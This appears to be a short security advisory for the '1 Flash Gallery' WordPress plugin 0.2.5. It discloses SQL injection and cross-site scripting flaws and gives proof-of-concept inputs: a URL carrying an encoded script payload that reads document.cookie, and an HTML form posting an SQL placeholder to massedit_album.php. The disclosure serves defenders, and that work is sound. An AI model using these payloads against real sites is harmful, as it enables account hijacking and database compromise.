1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
source: https://www.securityfocus.com/bid/46783/info 1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E <form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" > <input type="hidden" name="album_id" value="1" /> <input type="hidden" name="images" value="1" /> <input type="hidden" name="gall_id" value="SQL_CODE_HERE" /> <input type="submit" value="submit" name="submit" /> |